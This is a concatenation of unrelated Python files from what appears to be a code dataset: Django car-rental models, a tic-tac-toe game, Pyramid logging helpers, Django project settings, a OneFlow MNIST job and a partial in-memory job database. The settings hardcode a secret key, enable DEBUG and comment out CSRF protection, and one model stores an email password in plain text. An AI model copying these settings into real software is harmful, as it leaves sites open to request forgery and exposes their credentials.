models.CharField(max_length=50, blank=False, null=False)\n model_year = models.PositiveIntegerField(\n validators=[MinValueValidator(1984), MaxValueValidator(datetime.date.today().year)], blank=False)\n license_no = models.CharField(max_length=100, null=True, blank=True)\n tracking_id = models.CharField(max_length=100, null=True, blank=True)\n mileage = models.PositiveIntegerField(default=0, blank=False, null=False)\n 
transmission = models.CharField(max_length=20, choices=TRANSMISSIONS, blank=False, null=False)\n seats = models.PositiveIntegerField(default=0, blank=False, null=False)\n luggage = models.PositiveIntegerField(default=0, blank=False, null=False)\n fuels = models.ManyToManyField('Fuel', blank=True)\n description = models.TextField(blank=True, null=True)\n rental_price = MoneyField(max_digits=14, decimal_places=2, default=0.00, default_currency='USD', blank=False,\n null=False)\n price_variable = models.CharField(max_length=20, choices=PRICE_VARIATIONS, default='Month', blank=False, null=False)\n features = models.ManyToManyField('Feature', blank=True)\n is_published = models.BooleanField(default=True)\n is_featured = models.BooleanField(default=False)\n is_active = models.BooleanField(default=True)\n image = models.ImageField(upload_to='rental_exchange/car_images', null=True, blank=True)\n fitness_test = models.CharField(max_length=20, choices=[('Pass', 'Pass'), ('Fail', 'Fail')], null=True, blank=True)\n agreement_paper = models.FileField(upload_to='rental_exchange/agreement_papers/', null=True, blank=True)\n tags = models.CharField(max_length=512, blank=True, null=True)\n created_by = models.ForeignKey(User, on_delete=models.SET_NULL, blank=True, null=True, related_name=\"+\")\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n updated_by = models.ForeignKey(User, on_delete=models.SET_NULL, blank=True, null=True, related_name=\"+\")\n\n def __str__(self):\n return self.name\n\n class Meta:\n db_table = \"cars\"\n verbose_name_plural = \"Cars\".upper()\n ordering = (\"created_at\",)\n unique_together = ('name', 'model_no', 'model_year')\n\n def get_absolute_url(self):\n # return f\"car/{self.id}/\"\n return reverse('car-detail', args=[self.id])\n\n def is_booked(self):\n bookings = CarBooking.objects.filter(car=self.id, rent_status='On Going')\n return bookings.exists()\n\n\nclass Brand(models.Model):\n name = models.CharField(max_length=50, unique=True, blank=False, null=False)\n description = models.TextField(blank=True, null=True)\n logo = models.ImageField(upload_to='rental_exchange/brand_images', null=True, blank=True)\n created_by = models.ForeignKey(User, on_delete=models.SET_NULL, blank=True, null=True, related_name=\"+\")\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n updated_by = models.ForeignKey(User, on_delete=models.SET_NULL, blank=True, null=True, related_name=\"+\")\n\n def __str__(self):\n return self.name\n\n class Meta:\n db_table = \"brands\"\n verbose_name_plural = \"Brands\".upper()\n ordering = (\"name\",)\n\n\nclass Feature(models.Model):\n title = models.CharField(max_length=255, unique=True, blank=False, null=False)\n description = models.TextField(blank=True, null=True)\n created_by = models.ForeignKey(User, on_delete=models.SET_NULL, blank=True, null=True, related_name=\"+\")\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n updated_by = models.ForeignKey(User, on_delete=models.SET_NULL, blank=True, null=True, related_name=\"+\")\n\n def __str__(self):\n return self.title\n\n class Meta:\n db_table = \"features\"\n verbose_name_plural = \"Features\".upper()\n ordering = (\"title\",)\n\n\nclass Fuel(models.Model):\n title = models.CharField(max_length=255, unique=True, blank=False, null=False)\n description = models.TextField(blank=True, null=True)\n created_by = models.ForeignKey(User, 
on_delete=models.SET_NULL, blank=True, null=True, related_name=\"+\")\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n updated_by = models.ForeignKey(User, on_delete=models.SET_NULL, blank=True, null=True, related_name=\"+\")\n\n def __str__(self):\n return self.title\n\n class Meta:\n db_table = \"fuels\"\n verbose_name_plural = \"Fuels\".upper()\n ordering = (\"title\",)\n\n\n# class Owner(models.Model):\n# user = models.OneToOneField(User, on_delete=models.CASCADE)\n# phone = models.CharField(max_length=20, blank=False, null=False)\n# country = CountryField(blank=False, null=False)\n# city = models.CharField(max_length=100, blank=False, null=False)\n# address = models.CharField(max_length=255, blank=False, null=False)\n# image = models.ImageField(upload_to='rental_exchange/owner_images', null=True, blank=True)\n# created_by = models.ForeignKey(User, on_delete=models.SET_NULL, blank=True, null=True, related_name=\"+\")\n# created_at = models.DateTimeField(auto_now_add=True)\n# updated_at = models.DateTimeField(auto_now=True)\n# updated_by = models.ForeignKey(User, on_delete=models.SET_NULL, blank=True, null=True, related_name=\"+\")\n#\n# def __str__(self):\n# return self.user\n#\n# class Meta:\n# db_table = \"owners\"\n# verbose_name_plural = \"Owners\".upper()\n# ordering = (\"id\",)\n\n\n# class Customer(models.Model):\n# user = models.OneToOneField(User, on_delete=models.CASCADE)\n# phone = models.CharField(max_length=20, blank=False, null=False)\n# country = CountryField(blank=False, null=False)\n# city = models.CharField(max_length=100, blank=False, null=False)\n# address = models.CharField(max_length=255, blank=False, null=False)\n# image = models.ImageField(upload_to='rental_exchange/customer_images', null=True, blank=True)\n# created_by = models.ForeignKey(User, on_delete=models.SET_NULL, blank=True, null=True, related_name=\"+\")\n# created_at = models.DateTimeField(auto_now_add=True)\n# updated_at = models.DateTimeField(auto_now=True)\n# updated_by = models.ForeignKey(User, on_delete=models.SET_NULL, blank=True, null=True, related_name=\"+\")\n#\n# def __str__(self):\n# return self.user\n#\n# class Meta:\n# db_table = \"customers\"\n# verbose_name_plural = \"Customers\".upper()\n\n\nclass Blog(models.Model):\n title = models.CharField(max_length=255, blank=False, null=False)\n short_description = models.TextField(blank=False, null=False)\n description = models.TextField(blank=False, null=False)\n created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, blank=True, null=True,\n related_name=\"+\")\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n updated_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, blank=True, null=True,\n related_name=\"+\")\n\n def __str__(self):\n return self.title\n\n class Meta:\n db_table = \"blogs\"\n verbose_name_plural = \"Blogs\".upper()\n ordering = (\"-created_at\",)\n\n\nclass Comment(models.Model):\n comment = models.TextField(blank=False, null=False)\n blog = models.ForeignKey('Blog', on_delete=models.CASCADE, blank=True, null=True)\n created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, blank=True, null=True,\n related_name=\"+\")\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n updated_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, blank=True, null=True,\n 
related_name=\"+\")\n\n def __str__(self):\n return self.comment\n\n class Meta:\n db_table = \"comments\"\n verbose_name_plural = \"Comments\".upper()\n ordering = (\"created_at\",)\n\n\nclass Contact(models.Model):\n name = models.CharField(max_length=255, blank=False, null=False)\n email = models.EmailField(max_length=255, blank=False, null=False)\n subject = models.CharField(max_length=255, blank=False, null=False)\n message = models.TextField(blank=False, null=False)\n is_seen = models.BooleanField(default=False)\n customer = models.ForeignKey(User, on_delete=models.SET_NULL, blank=True, null=True, related_name=\"+\")\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return self.email\n\n class Meta:\n db_table = \"contacts\"\n verbose_name_plural = \"Contacts\".upper()\n ordering = (\"created_at\",)\n\n\nclass System(models.Model):\n site_title = models.CharField(max_length=255, default='Rental Exchange', blank=False, null=False)\n site_logo = models.ImageField(upload_to='rental_exchange/system', blank=False, null=False)\n contact_email = models.EmailField(max_length=255, blank=False, null=False)\n contact_phone = models.CharField(max_length=20, blank=False, null=False)\n contact_address = models.CharField(max_length=255, blank=False, null=False)\n email_from = models.EmailField(max_length=255, blank=False, null=False)\n email_from_password = models.CharField(max_length=255, blank=False, null=False)\n email_to = models.EmailField(max_length=255, blank=False, null=False)\n map_url = models.URLField(blank=False, null=False, verbose_name='Map')\n facebook_url = models.URLField(blank=False, null=False, verbose_name='Facebook')\n twitter_url = models.URLField(blank=False, null=False, verbose_name='Twitter')\n instagram_url = models.URLField(blank=False, null=False, verbose_name='Instagram')\n copyright_owner = models.CharField(max_length=100, blank=False, null=False)\n copyright_year = models.IntegerField(\n validators=[MinValueValidator(1984), MaxValueValidator(datetime.date.today().year)], blank=False)\n updated_at = models.DateTimeField(auto_now=True)\n updated_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, blank=True, null=True,\n related_name=\"+\")\n\n class Meta:\n db_table = \"systems\"\n verbose_name_plural = \"Systems\".upper()\n\n\nclass CarRegistrationRequest(models.Model):\n client_name = models.CharField(max_length=100, null=False, blank=False, verbose_name='Your Name')\n client_email = models.EmailField(max_length=100, null=False, blank=False, verbose_name='Email')\n client_phone = models.CharField(max_length=20, blank=False, null=False, verbose_name='Phone')\n client_address = models.CharField(max_length=255, blank=True, null=True, verbose_name='Address')\n car_title = models.CharField(max_length=255, null=False, blank=False, verbose_name='Car Title')\n car_model = models.CharField(max_length=50, null=False, blank=False, verbose_name='Car Model')\n model_year = models.IntegerField(validators=[MinValueValidator(1984), MaxValueValidator(datetime.date.today().year)], blank=False)\n message = models.TextField(null=True, blank=True)\n is_contacted = models.BooleanField(default=False)\n is_seen = models.BooleanField(default=False)\n created_at = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return '%s (%s)' %(self.client_name, self.client_email)\n\n class Meta:\n db_table = \"car_registration_requests\"\n verbose_name_plural = \"Car Registration 
Requests\".upper()\n ordering = (\"-created_at\",)\n\n\nclass CarBooking(models.Model):\n REQUEST_STATUS = [\n ('Pending', 'Pending'),\n ('Accepted', 'Accepted'),\n ('Rejected', 'Rejected')\n ]\n RENT_STATUS = [\n ('On Going', 'On Going'),\n ('Closed', 'Closed')\n ]\n PAYMENT_STATUS = [\n ('Paid', 'Paid'),\n ('Unpaid', 'Unpaid')\n ]\n RENT_FOR = [\n ('3', '3 Months'),\n ('4', '4 Months'),\n ('5', '5 Months'),\n ('6', '6 Months'),\n ('7', '7 Months'),\n ('8', '8 Months'),\n ('9', '9 Months'),\n ('10', '10 Months'),\n ('11', '11 Months'),\n ('12', '12 Months')\n ]\n car = models.ForeignKey('Car', on_delete=models.CASCADE, null=False, blank=False)\n customer = models.ForeignKey(User, on_delete=models.CASCADE, null=False, blank=False, related_name=\"+\")\n start_date = models.DateField(blank=False, null=False)\n rent_for = models.CharField(max_length=50, choices=RENT_FOR, blank=False, null=False)\n rental_cost = MoneyField(max_digits=14, decimal_places=2, default=0.00, default_currency='USD', blank=True, null=True)\n is_seen = models.BooleanField(default=False, blank=True)\n request_status = models.CharField(max_length=50, choices=REQUEST_STATUS, default='Pending', blank=True)\n rent_status = models.CharField(max_length=50, choices=RENT_STATUS, blank=True, null=True)\n payment_status = models.CharField(max_length=50, choices=PAYMENT_STATUS, default='Unpaid', blank=True)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n updated_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, blank=True, null=True,\n related_name=\"+\")\n\n def __str__(self):\n return '%s' %(self.car)\n\n class Meta:\n db_table = \"car_booking\"\n verbose_name_plural = \"Car Bookings\".upper()\n ordering = (\"-created_at\",)\n\n def get_remaining_days(self):\n start_date = self.start_date\n end_date = start_date + relativedelta(months=int(self.rent_for))\n date_difference = end_date - start_date\n return '%d Days' % date_difference.days\n\n\nclass PaymentHistory(models.Model):\n PAYMENT_METHODS = [\n ('Hand Cash', 'Hand Cash'),\n ('PayPal', 'PayPal')\n ]\n booking = models.OneToOneField('CarBooking', on_delete=models.CASCADE, null=False, blank=False)\n payment_method = models.CharField(max_length=50, choices=PAYMENT_METHODS, default='Hand Cash')\n amount = MoneyField(max_digits=14, decimal_places=2, default=0.00, default_currency='USD', blank=True, null=True)\n transaction_id = models.CharField(max_length=255, blank=True, null=True)\n payment_date = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.booking\n\n class Meta:\n db_table = \"payment_history\"\n verbose_name_plural = \"Payment History\".upper()\n ordering = (\"-payment_date\",)\n\n\nclass TransactionHistory(models.Model):\n booking = models.ForeignKey('CarBooking', on_delete=models.CASCADE, blank=False, null=False)\n added_amount = MoneyField(max_digits=14, decimal_places=2, default=0.00, default_currency='USD', blank=True, null=True)\n is_paid = models.BooleanField(default=False)\n created_at = models.DateTimeField(auto_now_add=True)\n paid_date = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return self.booking.car.owner\n\n class Meta:\n db_table = \"transaction_history\"\n verbose_name_plural = \"Transaction History\".upper()\n ordering = (\"-created_at\",)\n\n\nclass VehicleOwnerAccount(models.Model):\n account_holder = models.OneToOneField(User, on_delete=models.CASCADE, null=False, blank=False)\n total_income = 
MoneyField(max_digits=14, decimal_places=2, default=0.00, default_currency='USD', blank=True, null=True)\n last_added_amount = MoneyField(max_digits=14, decimal_places=2, default=0.00, default_currency='USD', blank=True, null=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return '%s' %(self.account_holder)\n\n class Meta:\n db_table = \"vehicle_owner_account\"\n verbose_name_plural = \"Vehicle Owner Accounts\".upper()\n ordering = (\"account_holder\",)","sub_path":"rental_exchange/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":17193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"451482406","text":"# TICTACTOE \n# from IPython.display import clear_output\n# 'clear_output()' works in jupyter notebook\n\n\nimport random\nimport os\n\n# Function to display the board\n# Based on the numpad of a keyboard where the numbers represent the positions of a player's marker\n \ndef display_board(board): # Prints and updates the board at each input from the player\n os.system('clear') # To clear the output screen each time an input is taken and show the updated table \n print('_'+board[7]+'_|_'+board[8]+'_|_'+board[9]+'_')\n print('_'+board[4]+'_|_'+board[5]+'_|_'+board[6]+'_')\n print('_'+board[1]+'_|_'+board[2]+'_|_'+board[3]+'_')\n\n# Function to take the player markers\ndef player_input(): # Player chooses his marker and the second player automatically gets the remaining marker\n\n marker = ''\n \n while marker != 'X' and marker != 'O': \n marker=input(\"Player1 choose 'X' or 'O': \").upper()\n \n Player1_marker=marker\n \n if Player1_marker=='X': # If Player 1 chooses 'X' second player gets 'O'\n Player2_marker='O'\n return ('X','O') # For later use through tuple unpacking \n \n else:\n Player2_marker='X' \n return ('O','X') # For later use through tuple unpacking\n\n# Function to place the marker\ndef place_marker(board, marker, position):\n\n board[position]=marker\n \n \n# Function to check for a Win\ndef win_check(board, mark):\n\n\t# Checking Conditions in all directions\n if ((board[1]==board[2]==board[3]==mark) or \n (board[4]==board[5]==board[6]==mark) or \n (board[7]==board[8]==board[9]==mark) or \n (board[1]==board[4]==board[7]==mark) or \n (board[2]==board[5]==board[8]==mark) or \n (board[3]==board[6]==board[9]==mark) or \n (board[1]==board[5]==board[9]==mark) or \n (board[3]==board[5]==board[7]==mark)):\n return True\n\n# Function to select a random player to go first\ndef choose_first():\n if random.randint(1,2)==1:\n return 'Player1'\n else:\n return 'Player2'\n\n# Function to check whether entered position is empty or not\ndef space_check(board, position):\n \n if board[position]==' ':\n return True\n else: \n return False\n \n# Function to check for a draw\ndef full_board_check(board):\n for i in range(1,10):\n if space_check(board, i):\n return False\n return True\n\n# Function to ask players for the position of the marker\ndef player_choice(board):\n position = 0\n while position not in [1,2,3,4,5,6,7,8,9] or not space_check(board, position):\n position = int(input('Choose your next position: (1-9) '))\n return position\n \n \n# ASK PLAYER WHETHER THEY WANNA PLAY AGAIN \ndef replay():\n return input('Do you want to play again? 
Enter Yes or No: ').upper().startswith('Y')\n \n \n# MAIN CODE \nprint('Welcome to Tic Tac Toe!')\n\nwhile True:\n # Basic Working\n The_board=[' ']*10 \n Player1_marker,Player2_marker=player_input() # To get the players markers and assign it to repective players through tuple unpacking\n \n turn=choose_first() # To choose a random player to go first\n print('{} will go first'.format(turn)) #prints which player will go first\n \n play_game=input('Are you ready to play the game: Enter YES or NO- ').upper() # Asks player if ready or not and starts the game if ready \n if play_game=='YES':\n game_on=True\n else:\n game_on=False\n \n while game_on:\n \n if turn=='Player1': # Checks if it's player 1 turn \n \n display_board(The_board) # Prints the empty board\n \n position=player_choice(The_board) # Takes the input of player 1 from the numpad\n \n place_marker(The_board, Player1_marker, position) # Places the marker of Player 1 on board \n \n if(win_check(The_board,Player1_marker)): # Checks for a win\n display_board(The_board)\n print('Congratulations! Player 1 you have won the game!')\n game_on = False # Breaks out of the loop\n \n else:\n \n if full_board_check(The_board): # Checks for a draw\n display_board(The_board)\n print('The game is a draw!')\n break\n \n else:\n turn='Player2' # Turn changes if none of the conditions above are satisfied\n \n else:\n display_board(The_board) # Prints the empty board \n \n position=player_choice(The_board) # Takes the input of player 1 from the numpad\n \n place_marker(The_board, Player2_marker, position) # Places the marker of Player 2 on board\n \n if(win_check(The_board,Player2_marker)):\n display_board(The_board)\n print('Congratulations! Player 2 you have won the game!')\n game_on = False\n \n else:\n \n if full_board_check(The_board):\n display_board(The_board)\n print('The game is a draw!')\n break\n \n else:\n turn='Player1'\n \n if not replay(): # Asks player it they want to play again and if input is no breaks out of the loop\n break\n","sub_path":"TicTacToe.py","file_name":"TicTacToe.py","file_ext":"py","file_size_in_byte":5422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"275690395","text":"\"\"\"\nInstall a filter on the logging handler to add some info about requests:\n * client_addr\n * method\n * matched_route\n * path\n\nA pyramid event handler is installed to setup this filter for the current request.\n\"\"\"\nimport json\nimport logging\nimport logging.config\nimport os\nimport socket\nimport sys\nfrom typing import Any, MutableMapping, Mapping, IO, Optional\n\nimport cee_syslog_handler\nfrom pyramid.threadlocal import get_current_request\n\n\nclass _PyramidFilter(logging.Filter):\n \"\"\"\n A logging filter that adds request information to CEE logs.\n \"\"\"\n\n def filter(self, record: Any) -> bool:\n request = get_current_request()\n if request is not None:\n record.client_addr = request.client_addr\n record.method = request.method\n if request.matched_route is not None:\n record.matched_route = request.matched_route.name\n record.path = request.path\n record.request_id = request.c2c_request_id\n record.level_name = record.levelname\n return True\n\n\n_PYRAMID_FILTER = _PyramidFilter()\n\n\ndef _un_underscore(message: MutableMapping[str, Any]) -> Mapping[str, Any]:\n \"\"\"\n Elasticsearch is not indexing the fields starting with underscore and cee_syslog_handler is starting\n a lot of interesting fields with underscore. 
Therefore, it's a good idea to remove all those underscore\n prefixes.\n \"\"\"\n for key, value in list(message.items()):\n if key.startswith(\"_\"):\n new_key = key[1:]\n if new_key not in message:\n del message[key]\n message[new_key] = value\n return message\n\n\ndef _rename_field(dico: MutableMapping[str, Any], source: str, dest: str) -> None:\n if source in dico:\n dico[dest] = dico[source]\n del dico[source]\n\n\ndef _make_message_dict(*args: Any, **kargv: Any) -> Mapping[str, Any]:\n \"\"\"\n patch cee_syslog_handler to rename message->full_message otherwise this part is dropped by syslog.\n \"\"\"\n msg = cee_syslog_handler.make_message_dict(*args, **kargv)\n if msg[\"message\"] != msg[\"short_message\"]:\n # only output full_message if it's different from short message\n msg[\"full_message\"] = msg[\"message\"]\n msg[\"full_msg\"] = \"true\"\n del msg[\"message\"]\n\n # make the output more consistent with the one from java\n _rename_field(msg, \"short_message\", \"msg\")\n _rename_field(msg, \"facility\", \"logger_name\")\n\n return _un_underscore(msg)\n\n\nclass PyramidCeeSysLogHandler(cee_syslog_handler.CeeSysLogHandler): # type: ignore\n \"\"\"\n A CEE (JSON format) log handler with additional information about the current request.\n \"\"\"\n\n def __init__(self, *args: Any, **kargv: Any) -> None:\n super().__init__(*args, **kargv)\n self.addFilter(_PYRAMID_FILTER)\n\n def format(self, record: Any) -> str:\n message = _make_message_dict(\n record,\n self._fqdn,\n self._debugging_fields,\n self._extra_fields,\n self._facility,\n self._static_fields,\n )\n return \": @cee: %s\" % json.dumps(message)\n\n\nclass JsonLogHandler(logging.StreamHandler):\n \"\"\"\n Log to stdout in JSON.\n \"\"\"\n\n def __init__(self, stream: Optional[IO[str]] = None):\n super().__init__(stream)\n self.addFilter(_PYRAMID_FILTER)\n self._fqdn = socket.getfqdn()\n\n def format(self, record: Any) -> str:\n message = _make_message_dict(\n record, self._fqdn, debugging_fields=True, extra_fields=True, facility=None, static_fields={}\n )\n return json.dumps(message)\n\n\ndef init(configfile: Optional[str] = None) -> Optional[str]:\n logging.captureWarnings(True)\n configfile_ = (\n configfile if configfile is not None else os.environ.get(\"C2CWSGIUTILS_CONFIG\", \"/app/production.ini\")\n )\n if os.path.isfile(configfile_):\n logging.config.fileConfig(configfile_, defaults=dict(os.environ))\n return configfile_\n else:\n level = os.environ.get(\"LOG_LEVEL\", os.environ.get(\"OTHER_LOG_LEVEL\", \"INFO\"))\n if os.environ.get(\"LOG_TYPE\") == \"json\":\n root = logging.getLogger()\n handler = JsonLogHandler(stream=sys.stdout)\n handler.setLevel(logging.NOTSET)\n root.addHandler(handler)\n root.setLevel(level)\n else:\n logging.basicConfig(\n level=level, format=\"%(asctime)-15s %(levelname)5s %(name)s %(message)s\", stream=sys.stderr\n )\n return None\n","sub_path":"c2cwsgiutils/pyramid_logging.py","file_name":"pyramid_logging.py","file_ext":"py","file_size_in_byte":4536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"336739213","text":"\"\"\"\nDjango settings for Billiards project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.6/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.6/ref/settings/\n\"\"\"\nfrom datetime import date,datetime\nimport time\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = 
os.path.dirname(os.path.dirname(__file__))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'o*3%q#@)ez#uuwgg5%7qbz+(=f50noqkm5@cw2p-rw37@k&!l#'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.admin',\n 'app',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n #'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'Billiards.urls'\n\nWSGI_APPLICATION = 'Billiards.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.6/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.6/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n#database mongo\nDB_NAME = 'Billiards'\nDB_IP_ADDRESS = '127.0.0.1'\nDB_PORT = 27017\nADMINS_COLLECTION = 'admins_collection'\nGOODS_COLLECTION = 'goods_collection'\nUSERS_COLLECTION = 'users_collection'\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.6/howto/static-files/\n\nSTATIC_URL = '/static/'\n\nSTATICFILES_DIRS = (\n os.path.join(os.path.dirname(__file__),'../web/resource').replace('\\\\','/'),\n '/var/www/static/',\n)\n\nTEMPLATE_DIRS = (\n os.path.join(os.path.dirname(__file__),'../web/templates').replace('\\\\','/')\n)\n\nFILE_UPLOAD_TEMP_DIR = (\n os.path.join(os.path.dirname(__file__),'../temp').replace('\\\\','/')\n)\n\n#DEFAULT_GOODS_ID = str(date.today().year) + str(date.today().month) + str(date.today().day)\ntemp = str(datetime.now())\n_id = ''\nmark = [':',' ','-','.']\nfor t in temp:\n if t not in mark:\n _id = _id + t\nDEFAULT_GOODS_ID = _id\nprint(STATICFILES_DIRS)\nprint(TEMPLATE_DIRS)\nprint(FILE_UPLOAD_TEMP_DIR)\nprint(DEFAULT_GOODS_ID)","sub_path":"Billiards/billiards/Billiards/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"124983331","text":"#!/usr/bin/env python\n#_*_coding:utf-8 _*_\n__author__ = \"SmartGo\"\n\n#l = []\n# name = input(\"please your name:\")\n# l.append(name)\n#\n# print(l)\n# total = item_one + \\\n# item_two + \\\n# item_three\na = 'hello'\nb = 'j'\nc = 'ls'\nret = a + \\\n b + \\\n c\nprint(ret)","sub_path":"c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"87859674","text":"from mnist_util import load_data\nimport oneflow as flow\nimport oneflow.typing as oft\n\nBATCH_SIZE = 100\n\n\ndef mlp(data):\n initializer = flow.truncated_normal(0.1)\n reshape = flow.reshape(data, [data.shape[0], -1])\n hidden = flow.layers.dense(reshape, 
512, activation=flow.nn.relu, kernel_initializer=initializer)\n return flow.layers.dense(hidden,\n 10,\n kernel_initializer=initializer,\n # dense weights are stored column-wise, so split along axis 0\n model_distribute=flow.distribute.split(axis=0)\n )\n\n\ndef get_train_config():\n config = flow.function_config()\n config.default_data_type(flow.float)\n config.train.primary_lr(0.1)\n config.train.model_update_conf({\"naive_conf\": {}})\n config.default_distribute_strategy(flow.distribute.consistent_strategy())\n\n return config\n\n\n@flow.global_function(get_train_config())\ndef train_job(images:oft.Numpy.Placeholder((BATCH_SIZE, 1, 28, 28), dtype=flow.float),\n labels:oft.Numpy.Placeholder((BATCH_SIZE,), dtype=flow.int32)):\n logits = mlp(images)\n loss = flow.nn.sparse_softmax_cross_entropy_with_logits(labels, logits, name=\"softmax_loss\")\n flow.losses.add_loss(loss)\n return loss\n\n\nif __name__ == '__main__':\n flow.config.gpu_device_num(2)\n check_point = flow.train.CheckPoint()\n check_point.init()\n\n (train_images, train_labels), (test_images, test_labels) = load_data(BATCH_SIZE)\n\n for epoch in range(3):\n for i, (images, labels) in enumerate(zip(train_images, train_labels)):\n def callback(loss):\n if i % 20 == 0: print(loss.mean())\n\n\n loss = train_job(images, labels).async_get(callback)\n","sub_path":"en/docs/code/extended_topics/mixed_parallel_mlp.py","file_name":"mixed_parallel_mlp.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"}
+{"seq_id":"136429629","text":"\"\"\"In-memory implementation of model adapter. Only works when you have a single\nclient using the master. Useful for testing and as a base class for versions\nof the model that load the entire db into memory (e.g. json_model).\n\"\"\"\n\nimport copy\n\nfrom common import *\nimport fix_path\nimport dist_job_mgr.model as model\nfrom dist_job_mgr.model import ModelError\n\nclass NodeUniquenessError(Exception):\n pass\n\nclass StaleRefError(Exception):\n \"\"\"This exception is thrown when the client attempts to reference\n an object that was from an aborted transaction.\n \"\"\"\n pass\n\ndef check_inc(me, other):\n if me.incarnation!=other.incarnation:\n msg = \"Attempt to reference a stale object from an aborted transaction. 
%s of type %s has incarnation %d, while %s of type %s has incarnation %d\" % \\\n (me, type(me), me.incarnation,\n other, type(other), other.incarnation)\n raise StaleRefError(msg)\n\n\nclass NodeDb(object):\n def __init__(self):\n self.by_name = {}\n self.by_hostname = {}\n self.by_public_ip = {}\n self.by_private_ip = {}\n\n def add_node(self, node):\n if self.by_name.has_key(node.name):\n raise NodeUniquenessError(\"Cannot create node %s, a node with that name already exists\" % node.name)\n if node.hostname and self.by_hostname.has_key(node.hostname):\n raise NodeUniquenessError(\"Cannot create node %s because node %s already has the same hostname %s\" %\n (node.name, self.by_hostname[node.hostname],\n node.hostname))\n if node.public_ip and self.by_public_ip.has_key(node.public_ip):\n raise NodeUniquenessError(\"Cannot create node %s because node %s already has the same public ip address %s\" %\n (node.name, self.by_public_ip[node.public_ip],\n node.public_ip))\n if node.private_ip and self.by_private_ip.has_key(node.private_ip):\n raise NodeUniquenessError(\"Cannot create node %s because node %s already has the same private ip address %s\" %\n (node.name, self.by_private_ip[node.private_ip],\n node.private_ip))\n self.by_name[node.name] = node\n if node.hostname: self.by_hostname[node.hostname] = node\n if node.public_ip: self.by_public_ip[node.public_ip] = node\n if node.private_ip: self.by_private_ip[node.private_ip] = node\n\n def find_node(self, name=None, hostname=None, public_ip=None,\n private_ip=None):\n def val_or_none(map, key):\n if map.has_key(key):\n return map[key]\n else:\n return None\n if name:\n return val_or_none(self.by_name, name)\n elif hostname:\n return val_or_none(self.by_hostname, hostname)\n elif public_ip:\n return val_or_none(self.by_public_ip, public_ip)\n elif private_ip:\n return val_or_none(self.by_private_ip, private_ip)\n else:\n raise Exception(\"Must specify one of name, hostname, public_ip, or private_ip\")\n\n def get_by_name(self, name):\n return self.by_name[name]\n \n def remove_node(self, node):\n assert self.by_name.has_key(node.name)\n del self.by_name[node.name]\n if node.hostname: del self.by_hostname[node.hostname]\n if node.public_ip: del self.by_public_ip[node.public_ip]\n if node.private_ip: del self.by_private_ip[node.private_ip]\n\n def get_all_nodes(self):\n return self.by_name.values()\n\nclass JobDb(object):\n def __init__(self):\n self.jobs_by_name = {}\n self.jobs_by_id = {}\n 